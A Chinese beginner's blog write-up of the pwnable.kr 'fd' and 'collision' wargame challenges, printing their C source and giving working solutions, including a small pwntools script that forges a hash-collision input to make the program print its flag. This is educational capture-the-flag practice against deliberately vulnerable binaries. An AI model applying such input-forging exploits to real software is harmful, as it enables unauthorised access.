小白pwn之旅之pwnable01

最新推荐文章于 2023-05-03 15:57:37 发布
最新推荐文章于 2023-05-03 15:57:37 发布
阅读量513 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41078843/article/details/105796730
版权

pwnable----fd和collsion

本人是萌新无意间看到这个pwnable.kr的网站,来学习学习,嘿嘿。这里是链接
这里的一个小tip。由于我用的是Ubuntu18.04版本在用ssh连接时报错,记录一下解决方法。

vim /etc/host
再将pwnable.kr的IP地址加在后面就行了

红线处

fd

  1. ssh链接网址
ssh fd@pwnable.kr -p2222

输入默认密码:guest
在这里插入图片描述

  1. 先ls,发现有flag直接白给,发现不行,只有老老实实的做
    在这里插入图片描述

  2. 看源代码lfd.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char buf[32];
int main(int argc, char* argv[], char* envp[]){
	if(argc<2){
		printf("pass argv[1] a number\n");
		return 0;
	}
	int fd = atoi( argv[1] ) - 0x1234;
	int len = 0;
	len = read(fd, buf, 32);
	if(!strcmp("LETMEWIN\n", buf)){
		printf("good job :)\n");
		system("/bin/cat flag");
		exit(0);
	}
	printf("learn about Linux file IO\n");
	return 0;

发现在运行时要输入一个数,如果这个数小于2,直接GG,当这个数是0x1234(10进制就是4660)就可以继续下去;再者你还要读取fd里的内容,如果buf===LETMEWIN就可以cat flag.

  1. 方法
./fd 4660
LETMEWIN

collsion

  1. ssh连接,登录
ssh col@pwnable.kr -p2222
  1. ls先,在看看有哪些
    在这里插入图片描述
    还是先看代码。主要看main。
#include <stdio.h>
#include <string.h>
unsigned long hashcode = 0x21DD09EC;
unsigned long check_password(const char* p){
	int* ip = (int*)p;
	int i;
	int res=0;
	for(i=0; i<5; i++){
		res += ip[i];
	}
	return res;
}

int main(int argc, char* argv[]){
	if(argc<2){
		printf("usage : %s [passcode]\n", argv[0]);
		return 0;
	}
	if(strlen(argv[1]) != 20){
		printf("passcode length should be 20 bytes\n");
		return 0;
	}

	if(hashcode == check_password( argv[1] )){
		system("/bin/cat flag");
		return 0;
	}
	else
		printf("wrong passcode.\n");
	return 0;
}

  1. 分析
    1 .首先传入参数,不然GG
    2 .长度还要是20个字节
    3 .如果check_password函数返回值===全局变量hashcode,那就能cat flag。否则GG。

  2. 解答
    1 .构造hashcode,让它hashcode=A+B*4,(ip中5个int就是hashcode的值)
    2 .开始exp

from pwn import *
argc=p32(0x19548164)+p32(0x2222222)*4
col=process(['./col',argc])
print col.recvline()

图片:
在这里插入图片描述

轩冕
关注
PWN入门之数组越界-附件资源
03-05
PWN入门之数组越界-附件资源
pwnable-blackjack
网安星空
02-08 893
pwnable.kr是一个经典的CTF中PWN方向练习的专业网站,本文记录的题目是blackjack,主要考察的是游戏类代码逻辑漏洞的利用。
pwnable-coin1
网安星空
02-07 2734
pwnable.kr是一个经典的CTF中PWN方向练习的专业网站,本文记录的题目是coin1,主要考察的是游戏类代码逻辑漏洞的利用。
PWN刷题】Pwnable-Start、Pwnable-orw
最新发布
QYbudong的博客
05-03 1544
③思路:打开文件sys_open('/home/orw/flag',0,0),读取文件sys_read(3,flag,0x100),写入标准输出sys_write(1,flag,0x30)。当然也可以用上边所说的,自己写汇编然后用asm生成shellcode,这种比较标准的函数还是建议用shellcraft,比较方便。这里解释一下,0x68732f6e和0x69622f2f组合在一起是hs/nib//,也就是binsh的小端序写法;而0xb,也就是11,是execve的系统调用号。入门级题目,保护全关。
pwnable 笔记 Rookiss - fsb - 20 pt
HiTaQini
12-17 3158
典型的格式化字符串漏洞
pwnable学习心得(一)
dezang2878的博客
02-17 241
前言:pwnable.kr这个学习网站是我学习pwn过程中主要肝的一个网站,因为要考研等种种原因没有办法继续肝题,写这个系列是希望对自己已经会了题进行一个总结,以及以我这种萌新的角度对题目的理解希望能帮助到各位初学者,有说的不对的地方还请多指教。 我理解的pwn是寻找服务器程序的漏洞,利用漏洞达到控制服务器的目的,在题目中体现为获取flag,因此我们需要做的事情有两件: 1.找...
PWN入门之libc表-附件资源
03-05
PWN入门之libc表-附件资源
PWN入门之栈迁移-附件资源
03-02
PWN入门之栈迁移-附件资源
pwnable-leg
网安星空
02-04 408
pwnable.kr是一个经典的CTF中PWN方向练习的专业网站,本文记录的题目是leg,主要考察的是基于ARM的寄存器与汇编相关知识点。
Pwnable
03-26
Pwnable
挑战:一组预先生成的pwn.college挑战
03-03
pwn.college 一组预先生成的pwn.college挑战! 设置 将<INSTANCE>替换为实例的名称: ./generate_sql.sh | docker exec -i < INSTANCE> _db mysql -uctfd -pctfd -Dctfd 警告 当前存在一个问题,其中在pwn.college基础结构中,docker映像名称只能为32个字节长。 为了解决这个问题: docker tag pwncollege/pwncollege_challenge pwncollege_challenge docker tag pwncollege/pwncollege_kernel_challenge pwncollege_kernel_challenge
pwnable-asm
网安星空
02-09 1478
pwnable.kr是一个经典的CTF中PWN方向练习的专业网站,本文记录的题目是asm,主要考察的是shellcode的使用。
pwnable.tw】 seethefile
weixin_30432179的博客
09-20 119
一开始特别懵的一道题。 main函数中一共4个功能,openfile、readfile、writefile、closefile。 其中,在最后退出时有一个明显的溢出,是scanf("%s",&name); name位于bss段上,name下面有一个fp用于存储文件指针,可以被覆盖。 再看其他函数: openfile.只有一个简单的输入并打开,保存文件指针在bss段上的fp...
pwnable_001
for_mat_的博客
09-05 199
ssh直连 $cat fd.c buf里面存的要是LETMEWIN才有可能拿到???? 所以往上一语句查看 buf的值是从fd获得的 argc是参数的个数 有一个默认参数,除了默认参数外还要传入其他参数argv[1],才有可能拿到旗 fd是文件指针文件指针如果为0,就会变成stdin键盘输入,argv[0]是文件名 因此: 只要fd的值为0就可以进行输入了 0x1...
pwnable.kr之bof
river
05-01 4419
bof   两种方法来做吧(就是入门为了练习,多接触一些。。。) 方法1:用ida直接看 算一下 输入的字符串s是ebp-2c 参数1 a1是ebp+8 距离是52,所以要覆盖52个字符。 但是这么简单的程序,抓住机会,小白练习一下gdb 方法2:用GDB调试,算参数地址 gdb bof
pwnable-[collision]
just do IT
06-20 719
进入服务器查看代码 ,flag必然没有r权限 #include <stdio.h> #include <string.h> unsigned long hashcode = 0x21DD09EC; unsigned long check_password(const char* p){ int* ip = (int*)p; int i; int res=0; fo...
pwnable.kr解题write up —— Toddler's Bottle(一)
逆水行舟
01-18 6741
网站地址:pwnable.kr 提供许多优质的ctf训练题,题目设计的都非常巧妙,适合思考。
pwnable.kr-----解题过程】random
lyuchen65的博客
09-16 1120
#include int main(){ unsigned int random; random = rand(); // random value! printf("%u",random); unsigned int key=0; scanf("%d", &key); if( (key ^ random) == 0xdeadbeef ){ printf("Good!\n")
pwnable.kr - fd
无节操
12-19 3634
题目: 题目链接:http://pwnable.kr/play.php ——> 连接登录:ssh fd@pwnable.kr -p2222查看文件及权限:ls -al看到flag文件,但是当前用户fd并没有读权限。 查看fd.ccat fd.c目标:执行system(“/bin/cat flag”); 则:strcmp(“LETMEWIN\n”, buf) == 0 则:buf =
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值